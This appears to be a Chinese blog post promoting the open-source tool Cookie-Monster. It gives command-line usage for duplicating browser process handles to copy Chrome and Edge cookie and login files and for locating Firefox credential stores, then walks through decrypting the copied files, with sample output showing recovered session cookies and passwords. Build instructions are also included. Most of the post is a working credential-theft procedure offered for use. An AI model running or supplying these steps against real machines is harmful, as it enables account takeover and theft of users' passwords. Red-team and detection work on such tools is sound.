[开源工具] - Cookie-Monster
系列 - Information Security
目录
1 【🔔】互联网工具,安全性未知,需要自行研判安全性。
2 Cookie-Monster
通过 BOF 或 exe 窃取 Edge、Chrome 和 Firefox 的浏览器 Cookie! Cookie-Monster 将提取 WebKit 主密钥,找到具有 Cookie 和登录数据文件句柄的浏览器进程,复制句柄,然后以无文件方式下载目标。下载 Cookie/登录数据文件后,Python 解密脚本可以帮助提取这些秘密!
Firefox模块将解析profiles.ini并找到logins.json和key4.db文件所在的位置并下载它们。离线解密引用了单独的 github 存储库。
3 Usage
Usage: cookie-monster [ --chrome || --edge || --firefox || --chromeCookiePID <pid> || --chromeLoginDataPID <PID> || --edgeCookiePID <pid> || --edgeLoginDataPID <pid>]
cookie-monster Example:
cookie-monster --chrome
cookie-monster --edge
cookie-moster --firefox
cookie-monster --chromeCookiePID 1337
cookie-monster --chromeLoginDataPID 1337
cookie-monster --edgeCookiePID 4444
cookie-monster --edgeLoginDataPID 4444
cookie-monster Options:
--chrome, looks at all running processes and handles, if one matches chrome.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD
--edge, looks at all running processes and handles, if one matches msedge.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD
--firefox, looks for profiles.ini and locates the key4.db and logins.json file
--chromeCookiePID, if chrome PID is provided look for the specified process with a handle to cookies is known, specifiy the pid to duplicate its handle and file
--chromeLoginDataPID, if chrome PID is provided look for the specified process with a handle to Login Data is known, specifiy the pid to duplicate its handle and file
--edgeCookiePID, if edge PID is provided look for the specified process with a handle to cookies is known, specifiy the pid to duplicate its handle and file
--edgeLoginDataPID, if edge PID is provided look for the specified process with a handle to Login Data is known, specifiy the pid to duplicate its handle and file 4 EXE Usage
Cookie Monster Example:
cookie-monster.exe --all
Cookie Monster Options:
-h, --help Show this help message and exit
--all Run chrome, edge, and firefox methods
--edge Extract edge keys and download Cookies/Login Data file to PWD
--chrome Extract chrome keys and download Cookies/Login Data file to PWD
--firefox Locate firefox key and Cookies, does not make a copy of either file5 Decryption Steps
- 必备依赖安装
pip3 install -r requirements.txt- Base64 编码 webkit 主密钥
python3 base64-encode.py "\xec\xfc...."- 解密 Chrome/Edge Cookie 文件
python .\decrypt.py "XHh..." --cookies ChromeCookie.db
Results Example:
-----------------------------------
Host: .github.com
Path: /
Name: dotcom_user
Cookie: KingOfTheNOPs
Expires: Oct 28 2024 21:25:22
Host: github.com
Path: /
Name: user_session
Cookie: x123.....
Expires: Nov 11 2023 21:25:22- 解密 Chome/Edge 密码文件
python .\decrypt.py "XHh..." --passwords ChromePasswords.db
Results Example:
-----------------------------------
URL: https://test.com/
Username: tester
Password: McTesty- 解密 Firefox Cookie 和存储的凭据: https://github.com/lclevy/firepwd
6 安装
在编译之前确保 Linux 上安装了 Mingw-w64 和 make。
make在windows上编译exe
gcc .\cookie-monster.c -o cookie-monster.exe -lshlwapi -lcrypt326.1 下载传送
下载和源码,最新版本和源代码可以在github找到。
相关内容
如果你觉得这篇文章对你有所帮助,欢迎赞赏~
